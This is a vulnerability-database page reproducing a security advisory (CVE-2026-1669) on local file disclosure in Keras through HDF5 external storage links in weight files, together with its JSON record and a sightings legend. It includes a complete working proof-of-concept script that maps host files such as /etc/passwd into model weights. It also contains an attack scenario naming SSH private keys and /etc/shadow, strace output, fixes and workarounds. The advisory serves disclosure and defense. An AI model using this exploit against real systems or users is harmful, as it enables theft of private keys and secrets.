GHSA-3M4Q-JMJ6-R34Q
Vulnerability from github – Published: 2026-02-18 22:41 – Updated: 2026-02-18 22:41Summary
TensorFlow / Keras continues to honor HDF5 “external storage” and ExternalLink features when loading weights. A malicious .weights.h5 (or a .keras archive embedding such weights) can direct load_weights() to read from an arbitrary readable filesystem path. The bytes pulled from that path populate model tensors and become observable through inference or subsequent re-save operations. Keras “safe mode” only guards object deserialization and does not cover weight I/O, so this behaviour persists even with safe mode enabled. The issue is confirmed on the latest publicly released stack (tensorflow 2.20.0, keras 3.11.3, h5py 3.15.1, numpy 2.3.4).
Impact
- Class: CWE-200 (Exposure of Sensitive Information), CWE-73 (External Control of File Name or Path)
- What leaks: Contents of any readable file on the host (e.g.,
/etc/hosts,/etc/passwd,/etc/hostname). - Visibility: Secrets appear in model outputs (e.g., Dense layer bias) or get embedded into newly saved artifacts.
- Prerequisites: Victim executes
model.load_weights()ortf.keras.models.load_model()on an attacker-supplied HDF5 weights file or.kerasarchive. - Scope: Applies to modern Keras (3.x) and TensorFlow 2.x lines; legacy HDF5 paths remain susceptible.
Attacker Scenario
- Initial foothold: The attacker convinces a user (or CI automation) to consume a weight artifact—perhaps by publishing a pre-trained model, contributing to an open-source repository, or attaching weights to a bug report.
- Crafted payload: The artifact bundles innocuous model metadata but rewrites one or more datasets to use HDF5 external storage or external links pointing at sensitive files on the victim host (e.g.,
/home/<user>/.ssh/id_rsa,/etc/shadowif readable, configuration files containing API keys, etc.). - Execution: The victim calls
model.load_weights()(ortf.keras.models.load_model()for.kerasarchives). HDF5 follows the external references, opens the targeted host file, and streams its bytes into the model tensors. - Exfiltration vectors:
- Running inference on controlled inputs (e.g., zero vectors) yields outputs equal to the injected weights; the attacker or downstream consumer can read the leaked data.
- Re-saving the model (weights or
.kerasarchive) persists the secret into a new artifact, which may later be shared publicly or uploaded to a model registry. - If the victim pushes the re-saved artifact to source control or a package repository, the attacker retrieves the captured data without needing continued access to the victim environment.
Additional Preconditions
- The target file must exist and be readable by the process running TensorFlow/Keras.
- Safe mode (
load_model(..., safe_mode=True)) does not mitigate the issue because the attack path is weight loading rather than object/lambda deserialization. - Environments with strict filesystem permissioning or sandboxing (e.g., container runtime blocking access to
/etc/hostname) can reduce impact, but common defaults expose a broad set of host files.
Environment Used for Verification (2025‑10‑19)
- OS: Debian-based container running Python 3.11.
- Packages (installed via
python -m pip install -U ...): tensorflow==2.20.0keras==3.11.3h5py==3.15.1numpy==2.3.4- Tooling:
strace(for syscall tracing),pipupgraded to latest before installs. - Debug flags:
PYTHONFAULTHANDLER=1,TF_CPP_MIN_LOG_LEVEL=0during instrumentation to capture verbose logs if needed.
Reproduction Instructions (Weights-Only PoC)
- Ensure the environment above (or equivalent) is prepared.
- Save the following script as
weights_external_demo.py:
from __future__ import annotations
import os
from pathlib import Path
import numpy as np
import tensorflow as tf
import h5py
def choose_host_file() -> Path:
candidates = [
os.environ.get("KFLI_PATH"),
"/etc/machine-id",
"/etc/hostname",
"/proc/sys/kernel/hostname",
"/etc/passwd",
]
for candidate in candidates:
if not candidate:
continue
path = Path(candidate)
if path.exists() and path.is_file():
return path
raise FileNotFoundError("set KFLI_PATH to a readable file")
def build_model(units: int) -> tf.keras.Model:
model = tf.keras.Sequential([
tf.keras.layers.Input(shape=(1,), name="input"),
tf.keras.layers.Dense(units, activation=None, use_bias=True, name="dense"),
])
model(tf.zeros((1, 1))) # build weights
return model
def find_bias_dataset(h5file: h5py.File) -> str:
matches: list[str] = []
def visit(name: str, obj) -> None:
if isinstance(obj, h5py.Dataset) and name.endswith("bias:0"):
matches.append(name)
h5file.visititems(visit)
if not matches:
raise RuntimeError("bias dataset not found")
return matches[0]
def rewrite_bias_external(path: Path, host_file: Path) -> tuple[int, int]:
with h5py.File(path, "r+") as h5file:
bias_path = find_bias_dataset(h5file)
parent = h5file[str(Path(bias_path).parent)]
dset_name = Path(bias_path).name
del parent[dset_name]
max_bytes = 128
size = host_file.stat().st_size
nbytes = min(size, max_bytes)
nbytes = (nbytes // 4) * 4 or 32 # multiple of 4 for float32 packing
units = max(1, nbytes // 4)
parent.create_dataset(
dset_name,
shape=(units,),
dtype="float32",
external=[(host_file.as_posix(), 0, nbytes)],
)
return units, nbytes
def floats_to_ascii(arr: np.ndarray) -> tuple[str, str]:
raw = np.ascontiguousarray(arr).view(np.uint8)
ascii_preview = bytes(b if 32 <= b < 127 else 46 for b in raw).decode("ascii", "ignore")
hex_preview = raw[:64].tobytes().hex()
return ascii_preview, hex_preview
def main() -> None:
host_file = choose_host_file()
model = build_model(units=32)
weights_path = Path("weights_demo.h5")
model.save_weights(weights_path.as_posix())
units, nbytes = rewrite_bias_external(weights_path, host_file)
print("secret_text_source", host_file)
print("units", units, "bytes_mapped", nbytes)
model.load_weights(weights_path.as_posix())
output = model.predict(tf.zeros((1, 1)), verbose=0)[0]
ascii_preview, hex_preview = floats_to_ascii(output)
print("recovered_ascii", ascii_preview)
print("recovered_hex64", hex_preview)
saved = Path("weights_demo_resaved.h5")
model.save_weights(saved.as_posix())
print("resaved_weights", saved.as_posix())
if __name__ == "__main__":
main()
- Execute
python weights_external_demo.py. - Observe:
secret_text_sourceprints the chosen host file path.recovered_ascii/recovered_hex64display the file contents recovered via model inference.- A re-saved weights file contains the leaked bytes inside the artifact.
Expanded Validation (Multiple Attack Scenarios)
The following test harness generalises the attack for multiple HDF5 constructs:
- Build a minimal feed-forward model and baseline weights.
- Create three malicious variants:
- External storage dataset: dataset references
/etc/hosts. - External link:
ExternalLinkpointing at/etc/passwd. - Indirect link: external storage referencing a helper HDF5 that, in turn, refers to
/etc/hostname. - Run each scenario under
strace -f -e trace=open,openat,readwhile callingmodel.load_weights(...). - Post-process traces and weight tensors to show the exact bytes loaded.
Relevant syscall excerpts captured during the run:
openat(AT_FDCWD, "/etc/hosts", O_RDONLY|O_CLOEXEC) = 7
read(7, "127.0.0.1 localhost\n", 64) = 21
...
openat(AT_FDCWD, "/etc/passwd", O_RDONLY|O_CLOEXEC) = 9
read(9, "root:x:0:0:root:/root:/bin/bash\n", 64) = 32
...
openat(AT_FDCWD, "/etc/hostname", O_RDONLY|O_CLOEXEC) = 8
read(8, "example-host\n", 64) = 13
The corresponding model weight bytes (converted to ASCII) mirrored these file contents, confirming successful exfiltration in every case.
Recommended Product Fix
- Default-deny external datasets/links:
- Inspect creation property lists (
get_external_count) before materialising tensors. - Resolve
SoftLink/ExternalLinktargets and block if they leave the HDF5 file. - Provide an escape hatch:
- Offer an explicit
allow_external_data=Trueflag or environment variable for advanced users who truly rely on HDF5 external storage. - Documentation:
- Update security guidance and API docs to clarify that weight loading bypasses safe mode and that external HDF5 references are rejected by default.
- Regression coverage:
- Add automated tests mirroring the scenarios above to ensure future refactors do not reintroduce the issue.
Workarounds
- Avoid loading untrusted HDF5 weight files.
- Pre-scan weight files using
h5pyto detect external datasets or links before invoking Keras loaders. - Prefer alternate formats (e.g., NumPy
.npz) that lack external reference capabilities when exchanging weights. - If isolation is unavoidable, run the load inside a sandboxed environment with limited filesystem access.
Timeline (UTC)
- 2025‑10‑18: Initial proof against TensorFlow 2.12.0 confirmed local file disclosure.
- 2025‑10‑19: Re-validated on TensorFlow 2.20.0 / Keras 3.11.3 with syscall tracing; produced weight artifacts and JSON summaries for each malicious scenario; implemented
safe_keras_hdf5.pyprototype guard.
{
"affected": [
{
"package": {
"ecosystem": "PyPI",
"name": "keras"
},
"ranges": [
{
"events": [
{
"introduced": "3.13.0"
},
{
"fixed": "3.13.2"
}
],
"type": "ECOSYSTEM"
}
]
},
{
"package": {
"ecosystem": "PyPI",
"name": "keras"
},
"ranges": [
{
"events": [
{
"introduced": "3.0.0"
},
{
"fixed": "3.12.1"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2026-1669"
],
"database_specific": {
"cwe_ids": [
"CWE-200",
"CWE-73"
],
"github_reviewed": true,
"github_reviewed_at": "2026-02-18T22:41:58Z",
"nvd_published_at": null,
"severity": "HIGH"
},
"details": "## Summary\n\nTensorFlow / Keras continues to honor HDF5 \u201cexternal storage\u201d and `ExternalLink` features when loading weights. A malicious `.weights.h5` (or a `.keras` archive embedding such weights) can direct `load_weights()` to read from an arbitrary readable filesystem path. The bytes pulled from that path populate model tensors and become observable through inference or subsequent re-save operations. Keras \u201csafe mode\u201d only guards object deserialization and does not cover weight I/O, so this behaviour persists even with safe mode enabled. The issue is confirmed on the latest publicly released stack (`tensorflow 2.20.0`, `keras 3.11.3`, `h5py 3.15.1`, `numpy 2.3.4`).\n\n## Impact\n\n- **Class**: CWE-200 (Exposure of Sensitive Information), CWE-73 (External Control of File Name or Path)\n- **What leaks**: Contents of any readable file on the host (e.g., `/etc/hosts`, `/etc/passwd`, `/etc/hostname`).\n- **Visibility**: Secrets appear in model outputs (e.g., Dense layer bias) or get embedded into newly saved artifacts.\n- **Prerequisites**: Victim executes `model.load_weights()` or `tf.keras.models.load_model()` on an attacker-supplied HDF5 weights file or `.keras` archive.\n- **Scope**: Applies to modern Keras (3.x) and TensorFlow 2.x lines; legacy HDF5 paths remain susceptible.\n\n## Attacker Scenario\n\n1. **Initial foothold**: The attacker convinces a user (or CI automation) to consume a weight artifact\u2014perhaps by publishing a pre-trained model, contributing to an open-source repository, or attaching weights to a bug report.\n2. **Crafted payload**: The artifact bundles innocuous model metadata but rewrites one or more datasets to use HDF5 external storage or external links pointing at sensitive files on the victim host (e.g., `/home/\u003cuser\u003e/.ssh/id_rsa`, `/etc/shadow` if readable, configuration files containing API keys, etc.).\n3. **Execution**: The victim calls `model.load_weights()` (or `tf.keras.models.load_model()` for `.keras` archives). HDF5 follows the external references, opens the targeted host file, and streams its bytes into the model tensors.\n4. **Exfiltration vectors**:\n - Running inference on controlled inputs (e.g., zero vectors) yields outputs equal to the injected weights; the attacker or downstream consumer can read the leaked data.\n - Re-saving the model (weights or `.keras` archive) persists the secret into a new artifact, which may later be shared publicly or uploaded to a model registry.\n - If the victim pushes the re-saved artifact to source control or a package repository, the attacker retrieves the captured data without needing continued access to the victim environment.\n\n### Additional Preconditions\n\n- The target file must exist and be readable by the process running TensorFlow/Keras.\n- Safe mode (`load_model(..., safe_mode=True)`) does not mitigate the issue because the attack path is weight loading rather than object/lambda deserialization.\n- Environments with strict filesystem permissioning or sandboxing (e.g., container runtime blocking access to `/etc/hostname`) can reduce impact, but common defaults expose a broad set of host files.\n\n## Environment Used for Verification (2025\u201110\u201119)\n\n- OS: Debian-based container running Python 3.11.\n- Packages (installed via `python -m pip install -U ...`):\n - `tensorflow==2.20.0`\n - `keras==3.11.3`\n - `h5py==3.15.1`\n - `numpy==2.3.4`\n- Tooling: `strace` (for syscall tracing), `pip` upgraded to latest before installs.\n- Debug flags: `PYTHONFAULTHANDLER=1`, `TF_CPP_MIN_LOG_LEVEL=0` during instrumentation to capture verbose logs if needed.\n\n## Reproduction Instructions (Weights-Only PoC)\n\n1. Ensure the environment above (or equivalent) is prepared.\n2. Save the following script as `weights_external_demo.py`:\n\n```python\nfrom __future__ import annotations\nimport os\nfrom pathlib import Path\nimport numpy as np\nimport tensorflow as tf\nimport h5py\n\ndef choose_host_file() -\u003e Path:\n candidates = [\n os.environ.get(\"KFLI_PATH\"),\n \"/etc/machine-id\",\n \"/etc/hostname\",\n \"/proc/sys/kernel/hostname\",\n \"/etc/passwd\",\n ]\n for candidate in candidates:\n if not candidate:\n continue\n path = Path(candidate)\n if path.exists() and path.is_file():\n return path\n raise FileNotFoundError(\"set KFLI_PATH to a readable file\")\n\ndef build_model(units: int) -\u003e tf.keras.Model:\n model = tf.keras.Sequential([\n tf.keras.layers.Input(shape=(1,), name=\"input\"),\n tf.keras.layers.Dense(units, activation=None, use_bias=True, name=\"dense\"),\n ])\n model(tf.zeros((1, 1))) # build weights\n return model\n\ndef find_bias_dataset(h5file: h5py.File) -\u003e str:\n matches: list[str] = []\n def visit(name: str, obj) -\u003e None:\n if isinstance(obj, h5py.Dataset) and name.endswith(\"bias:0\"):\n matches.append(name)\n h5file.visititems(visit)\n if not matches:\n raise RuntimeError(\"bias dataset not found\")\n return matches[0]\n\ndef rewrite_bias_external(path: Path, host_file: Path) -\u003e tuple[int, int]:\n with h5py.File(path, \"r+\") as h5file:\n bias_path = find_bias_dataset(h5file)\n parent = h5file[str(Path(bias_path).parent)]\n dset_name = Path(bias_path).name\n del parent[dset_name]\n max_bytes = 128\n size = host_file.stat().st_size\n nbytes = min(size, max_bytes)\n nbytes = (nbytes // 4) * 4 or 32 # multiple of 4 for float32 packing\n units = max(1, nbytes // 4)\n parent.create_dataset(\n dset_name,\n shape=(units,),\n dtype=\"float32\",\n external=[(host_file.as_posix(), 0, nbytes)],\n )\n return units, nbytes\n\ndef floats_to_ascii(arr: np.ndarray) -\u003e tuple[str, str]:\n raw = np.ascontiguousarray(arr).view(np.uint8)\n ascii_preview = bytes(b if 32 \u003c= b \u003c 127 else 46 for b in raw).decode(\"ascii\", \"ignore\")\n hex_preview = raw[:64].tobytes().hex()\n return ascii_preview, hex_preview\n\ndef main() -\u003e None:\n host_file = choose_host_file()\n model = build_model(units=32)\n\n weights_path = Path(\"weights_demo.h5\")\n model.save_weights(weights_path.as_posix())\n\n units, nbytes = rewrite_bias_external(weights_path, host_file)\n print(\"secret_text_source\", host_file)\n print(\"units\", units, \"bytes_mapped\", nbytes)\n\n model.load_weights(weights_path.as_posix())\n output = model.predict(tf.zeros((1, 1)), verbose=0)[0]\n ascii_preview, hex_preview = floats_to_ascii(output)\n print(\"recovered_ascii\", ascii_preview)\n print(\"recovered_hex64\", hex_preview)\n\n saved = Path(\"weights_demo_resaved.h5\")\n model.save_weights(saved.as_posix())\n print(\"resaved_weights\", saved.as_posix())\n\nif __name__ == \"__main__\":\n main()\n```\n\n3. Execute `python weights_external_demo.py`.\n4. Observe:\n - `secret_text_source` prints the chosen host file path.\n - `recovered_ascii`/`recovered_hex64` display the file contents recovered via model inference.\n - A re-saved weights file contains the leaked bytes inside the artifact.\n\n## Expanded Validation (Multiple Attack Scenarios)\n\nThe following test harness generalises the attack for multiple HDF5 constructs:\n\n- Build a minimal feed-forward model and baseline weights.\n- Create three malicious variants:\n 1. **External storage dataset**: dataset references `/etc/hosts`.\n 2. **External link**: `ExternalLink` pointing at `/etc/passwd`.\n 3. **Indirect link**: external storage referencing a helper HDF5 that, in turn, refers to `/etc/hostname`.\n- Run each scenario under `strace -f -e trace=open,openat,read` while calling `model.load_weights(...)`.\n- Post-process traces and weight tensors to show the exact bytes loaded.\n\nRelevant syscall excerpts captured during the run:\n\n```\nopenat(AT_FDCWD, \"/etc/hosts\", O_RDONLY|O_CLOEXEC) = 7\nread(7, \"127.0.0.1 localhost\\n\", 64) = 21\n...\nopenat(AT_FDCWD, \"/etc/passwd\", O_RDONLY|O_CLOEXEC) = 9\nread(9, \"root:x:0:0:root:/root:/bin/bash\\n\", 64) = 32\n...\nopenat(AT_FDCWD, \"/etc/hostname\", O_RDONLY|O_CLOEXEC) = 8\nread(8, \"example-host\\n\", 64) = 13\n```\n\nThe corresponding model weight bytes (converted to ASCII) mirrored these file contents, confirming successful exfiltration in every case.\n\n## Recommended Product Fix\n\n1. **Default-deny external datasets/links**:\n - Inspect creation property lists (`get_external_count`) before materialising tensors.\n - Resolve `SoftLink` / `ExternalLink` targets and block if they leave the HDF5 file.\n2. **Provide an escape hatch**:\n - Offer an explicit `allow_external_data=True` flag or environment variable for advanced users who truly rely on HDF5 external storage.\n3. **Documentation**:\n - Update security guidance and API docs to clarify that weight loading bypasses safe mode and that external HDF5 references are rejected by default.\n4. **Regression coverage**:\n - Add automated tests mirroring the scenarios above to ensure future refactors do not reintroduce the issue.\n\n## Workarounds\n\n- Avoid loading untrusted HDF5 weight files.\n- Pre-scan weight files using `h5py` to detect external datasets or links before invoking Keras loaders.\n- Prefer alternate formats (e.g., NumPy `.npz`) that lack external reference capabilities when exchanging weights.\n- If isolation is unavoidable, run the load inside a sandboxed environment with limited filesystem access.\n\n## Timeline (UTC)\n\n- **2025\u201110\u201118**: Initial proof against TensorFlow 2.12.0 confirmed local file disclosure.\n- **2025\u201110\u201119**: Re-validated on TensorFlow 2.20.0 / Keras 3.11.3 with syscall tracing; produced weight artifacts and JSON summaries for each malicious scenario; implemented `safe_keras_hdf5.py` prototype guard.",
"id": "GHSA-3m4q-jmj6-r34q",
"modified": "2026-02-18T22:41:58Z",
"published": "2026-02-18T22:41:58Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/keras-team/keras/security/advisories/GHSA-3m4q-jmj6-r34q"
},
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-1669"
},
{
"type": "WEB",
"url": "https://github.com/keras-team/keras/pull/22057"
},
{
"type": "WEB",
"url": "https://github.com/keras-team/keras/commit/8a37f9dadd8e23fa4ee3f537eeb6413e75d12553"
},
{
"type": "PACKAGE",
"url": "https://github.com/keras-team/keras"
},
{
"type": "WEB",
"url": "https://github.com/keras-team/keras/releases/tag/v3.12.1"
},
{
"type": "WEB",
"url": "https://github.com/keras-team/keras/releases/tag/v3.13.2"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:L/A:N",
"type": "CVSS_V3"
}
],
"summary": "Keras has a Local File Disclosure via HDF5 External Storage During Keras Weight Loading"
}
Sightings
| Author | Source | Type | Date |
|---|
Nomenclature
- Seen: The vulnerability was mentioned, discussed, or observed by the user.
- Confirmed: The vulnerability has been validated from an analyst's perspective.
- Published Proof of Concept: A public proof of concept is available for this vulnerability.
- Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
- Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
- Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
- Not confirmed: The user expressed doubt about the validity of the vulnerability.
- Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.